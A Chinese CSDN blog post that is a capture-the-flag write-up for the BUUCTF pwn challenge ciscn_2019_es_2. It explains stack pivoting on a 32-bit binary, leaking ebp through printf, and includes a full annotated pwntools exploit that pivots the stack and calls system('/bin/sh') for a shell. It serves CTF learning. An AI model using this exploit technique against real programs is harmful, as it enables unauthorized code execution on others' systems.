BUUCTF ciscn_2019_es_2

已于 2022-11-05 19:25:19 修改
阅读量308 收藏
点赞数 2
分类专栏: Pwn 文章标签: linux python 网络 网络安全 学习
于 2022-11-02 12:52:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29912475/article/details/127644858
版权

本题难点:栈迁移

1.Checksec & IDA Pro

0ca61d1d74aa43b98d6b04d06431a54d.png

fec5680193d24a3b8cb67fd0eaabc376.png

main函数内容如下

int __cdecl main(int argc, const char **argv, const char **envp)
{
  init();
  puts("Welcome, my friend. What's your name?");
  vul();
  return 0;
}

 没什么东西,主要是调用了 init 与 vul 函数

init 函数

int init()
{
  setvbuf(stdin, 0, 2, 0);
  return setvbuf(stdout, 0, 2, 0);
}

vul 函数

int vul()
{
  char s[40]; // [esp+0h] [ebp-28h] BYREF

  memset(s, 0, 0x20u);
  read(0, s, 0x30u);
  printf("Hello, %s\n", s);
  read(0, s, 0x30u);
  return printf("Hello, %s\n", s);
}

hack 函数

int hack()
{
  return system("echo flag");
}

2.源码分析:

echo flag 只是在屏幕上打印了 flag 4个字母。而不是cat flag。因此行不通。但是system可以拿来用作执行指令,比如 /bin/sh 。

可以看到有栈溢出漏洞,但是有一个问题就是:

83941891aa55458894655f5ba047cb19.png

由于对 s 大小的限定,最多是 0x30 ,但是需要填充0x28的数据。最多再放下一条ret指令。但是hack函数内并没有直接获取flag或者shell的东西。 

这时候就得使用栈迁移了。

栈迁移的两个条件:

1.存在 leave , ret gadget

2.有可以执行的内存段/或者 system 等函数

 

栈迁移的原理介绍及应用:

栈迁移原理介绍与应用_Max1z的博客-CSDN博客_栈迁移

 3.栈迁移

1135e8893ae04e7686233a5596b1de44.png

 vul 函数中使用了 printf 函数。

printf函数在没有遇到 \x00 之前会一直输出内容直到遇到 \x00

这就是部分 锟斤拷烫烫烫 的原因

本题中劫持目标地址为缓冲区变量 s 的起始地址。要计算这部分地址,可以使用 ebp + 偏移量 的方式。栈上 ebp 可以使用 printf 泄露。

6e87165593f743b19c322bd0f2bae943.png

可以把断点下在 vul 函数中的nop上。

b4a0f05c72314864992b57704fd2c94f.png

4efac4bf7d7c471fbf903a4ad5c134b6.png

523587beebeb4c83847a87f809a330df.png

 为什么是 0xffffd0d8 呢?因为 ebp 指向的 0xffffd0c8 是所存内容的地址,指向的内容 0xffffd0d8 ,也就是栈上 ebp , 为main函数的 old ebp 。 与变量 s 的距离为 0x38。

dfd095f9a41346ccb52c2225d6d883ac.png

 也就是 s 的起始地址为 ( old ebp - 0x38 ),也就是劫持目标地址。

6a101933e04341f49f8edf09ccd0abe8.png

Payload 思路:

1.首先泄露 s 地址,然后输入aaaa,填充system地址的前4个字节。因为esp指向aaaa时,执行的是aaaa下一条地址。

2.填充system地址,后4字节用aaaa或者任意东西填充。

3.填充/bin/sh

 

4.构造PoC

 首先寻找是否存在可用的leave ret gadget

e74351c7b9a54420875576aaeca1baf2.png

from pwn import *

io = process("/root/Desktop/PwnSubjects/ciscn_2019_es_2")
elf = ELF("/root/Desktop/PwnSubjects/ciscn_2019_es_2")

leave_ret_addr = 0x80484B8
system = 0x8048400

payload_leak = b'A' * ( 0x27 ) + b'B'
io.send(payload_leak)
io.recvuntil(b'B')
original_ebp = u32(io.recv(4))
print("Original ebp Address: ",hex(original_ebp))

payload_main = b'a' * 4
payload_main += p32(system)
payload_main += b'b' * 4
payload_main += p32(original_ebp - 0x28)
payload_main += b'/bin/sh\x00'
print(payload_main)
payload_main = payload_main.ljust(0x28,b'p')
payload_main += p32(original_ebp - 0x38)
payload_main += p32(leave_ret_addr)
print(payload_main)

io.sendline(payload_main)
io.interactive()

 PoC解析:

payload_leak

利用了printf函数在遇到 '\x00' 后才会停止输出的漏洞

payload_leak = b'A' * ( 0x27 ) + b'B' # 用27个A与1个B,1个B用来 recvuntil
io.send(payload_leak) # 不能使用 sendline,sendline会自动在末尾发送 '\x00',而 send 不会
io.recvuntil(b'B') # 接收 ebp 地址
original_ebp = u32(io.recv(4)) # 解包 ebp 地址
print("Original ebp Address: ",hex(original_ebp)) # 打引 ebp 的地址

payload_main

payload_main = b'a' * 4 # 发送4个a,随便输
payload_main += p32(system)
payload_main += b'b' * 4 # system执行完后的返回地址 随便写
payload_main += p32(original_ebp - 0x28) # /bin/sh 的地址
payload_main += b'/bin/sh\x00'  # /bin/sh
payload_main = payload_main.ljust(0x28,b'p') # 将payload补齐到0x28,注意这里是 = 不是 +=
payload_main += p32(original_ebp - 0x38) # 劫持栈
payload_main += p32(leave_ret_addr)

449e5f370c6e465b9ff25e35b7acb3b2.png

 7d4da0e5813f40b7abce9157ab0ce3a2.png

 成功获取shell 

 

Red-Leaves
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF ciscn_2019_c_1(ret2libc)
weixin_45441024的博客
01-04 374
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
赛点资源数据包_嵌入式_2019.zip
06-28
赛点资源数据包_嵌入式_2019.zip是一个针对嵌入式领域的学习资料集合,旨在帮助开发者深入理解和掌握嵌入式系统的关键技术和最新趋势。 首先,我们要理解什么是嵌入式系统。嵌入式系统是嵌入到其他设备或系统中的...
NSSCTF 刷题记录
红叶的博客
03-07 943
本篇文章主要写几个值得记一笔的题目,其他题目都是类似换皮。
BUUCTFPWN】ciscn_2019_es_2 栈迁移 栈劫持
m0_55368674的博客
01-16 624
BUUCTFPWN】ciscn_2019_es_2题解
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1006
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
[BUUCTF]PWN——ciscn_2019_es_2
mcmuyanga的博客
10-27 2264
ciscn_2019_es_2 附件 步骤: 例行检查,32位程序,开启了nx保护 32位ida载入,shif+f12查看程序里的字符串,这边的“echo flag” 是个迷惑性的字符串,它只是输出了flag这4个字符,但是程序里有system函数,到时候这个函数可以直接拿来使用 system_addr=0x80048400 main函数 程序主体在vul函数里 读入0x30字节数据给s,s大小是0x28,只能溢出0x8字节,覆盖到ret,没法构造太长的rop,但是这边可以给s写入
ciscn_2019_es_2【BUUCTF
qq_41696518的博客
09-02 841
与往常溢出不同的是,该溢出仅仅只能溢出8(0x30-0x28)字节的数据,恰好就是覆盖ebp和ret地址数据,并且存在两处溢出漏洞。因此可以用read函数将system(“/bin/sh”)读到当前栈中,并返回让其执行该函数即可。这里有两个问题,1.system(“/bin/sh”)存储地址如何得知 2. 如何返回该system地址执行函数。
gl_code.rar_V2 _opengl es_opengl es 2.0
09-24
OpenGL ES 2.0 code for Linux v2.13.6.
2019年欧洲车身会议蔚来ES8_Benchmark数据.pdf
01-21
2019年欧洲车身会议蔚来ES8_Benchmark数据
Elasticsearch 中国开发者调查报告_2019.pdf
12-20
2010年 Elasticsearch 首个...为了深入了解 Elasticsearch 开发者群体的现状,2019 年 11 月,Elastic 技术社区、阿里巴巴 Elasticsearch 技术团队和阿里云开发者社区三方联合发起了 Elasticsearch 开发者调研活动。
Sample6_2.rar_opengl es_opengl es 2.0
09-19
OpenGL ES 2.0 3D eaample
[PWN] BUUCTF ciscn_2019_es_2
空城惜梦的博客
06-20 1226
[PWN] BUUCTF ciscn_2019_es_2解题分析漏洞利用payload解析程序执行过程图参考: 解题分析 按照惯例checksec一下,开了NX与RELRO 运行程序,查看逻辑,两次input,并且回显Hello,input 32位IDA打开,查看关键函数vul(),发现两次read往s里写内容,read可写0x30个字节,但s的缓冲区只有0x28个字节,所以这里存在着栈溢出,若有backdoor直接获得flag的话,可直接构造 payload=0x28*‘a’+ebp+backdoo
ctf pwn 题目
m0_64195960的博客
04-11 1341
2022年3月21栈迁移 这道题是栈迁移 1)先checksec一下 嗯哼哼,貌似影响不大 2)丢在ida里瞅 1、main() 没啥用再看看其它的 2、vul() 第一个read读进去的东西,可以被printf呸!吐出来! 芜湖!看到了第二个read可以栈溢出,但是可以溢出的空间太少! ————————那么就要来到了,刚学习的栈迁移—————————— 3、hack() 芜湖看到system函数了,那我们就可以获得system的返回地址从而调用.
2019CISCN华南赛区半决赛 pwn
qq_41071646的博客
12-09 835
好久没有练过pwn了,, 感觉自己pwn 都废了,, 近期打算刷一下攻防世界的android 然后 刷刷这个华南赛区的pwn。 如果刷的差不多 打算继续刷buuoj 。暂时把自己会的刷完。。 pwn1 这个题目真的很有意思 感觉出题人费心了 edit 函数已经给限制了 然后show 函数也限制了 edit 函数????️一个 off by null 由于没有开pie un...
今天你pwn了吗(三)
蚁景网安学院
06-04 742
前言我们接着前两篇的内容继续往下学习。所有题目都可在BUU平台搜索得到 Ctal+F 然后输入题目名字即可。同样的,在开始之前我们先来看下几个 函数吧,一定要 好好学下遇到的函数呢,很重...
[栈迁移][BUUCTF][PWN] ciscn_2019_es_2
m0_50819561的博客
09-25 392
前置知识: 栈迁移概念:当存在栈溢出且可溢出长度不足以容纳 payload 时,可采用栈迁移。一般这种情况下,溢出仅能覆盖 ebp 、 eip 。因为原来的栈空间不足,所以要构建一个新的栈空间放下 payload ,因此称为栈迁移。 栈迁移原理:栈执行命令是从esp指向的位置想ebp指向的位置执行。正常情况退栈的操作是:esp指向ebp指向位置,ebp指向ebp里的内容所指向的位置。当遇见leave|ret命令的时候,相当于执行mov esp ebp; pop ebp; ret;作用就是将ebp指向的位置给
栈迁移学习(buuctf [Black Watch 入群题])
像初雪一样自由洒落
03-14 982
i春秋的borrowstack是栈迁移和万能gadget的混合,,,然后writeup看的不是很明白,也没有很细的解析,所以,emmm,应该是自己栈迁移学的不是很好,只是知道大概的意思,但是还没有做过题,这次在看雪看到文章,就好好学一下,做到题啦!! 栈迁移,我觉得比较好理解,如果试过将调用一个函数过程好好自己试过的话,知道控制ebp,可以控制函数的去向,详细可以看看这篇图示:https://b...
buuctf ciscn_2019_es_2 栈迁移(二)
weixin_45441024的博客
12-10 278
buuctf ciscn_2019_es_2 栈迁移(二) 相关的方法和步骤在后面注明 from pwn import * proc_name = '/home/pwn/Desktop/ciscn_2019_es_2' p = remote('node3.buuoj.cn', 27732) elf = ELF(proc_name) system_plt = elf.plt['system'] main_addr = elf.sym['main'] leave_ret = 0x80484b8 log.in
BUUCTF-pwn(8)
njh18790816639的博客
12-29 534
es 删除数据_干货 | 携程Elasticsearch数据同步实践
最新发布
06-07
抱歉,我不太明白您的问题。您需要关于 Elasticsearch 的数据删除操作的信息吗?如果是的话,可以使用 Elasticsearch 提供的 Delete API 来删除单个或多个文档。例如,您可以使用以下命令删除具有指定 ID 的单个文档: ``` DELETE /my_index/_doc/1 ``` 您也可以使用 Query DSL 来删除与特定条件匹配的多个文档。例如,以下命令将删除所有 age 字段小于 30 的文档: ``` DELETE /my_index/_doc/_delete_by_query { "query": { "range": { "age": { "lt": 30 } } } } ``` 希望这可以帮助您。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值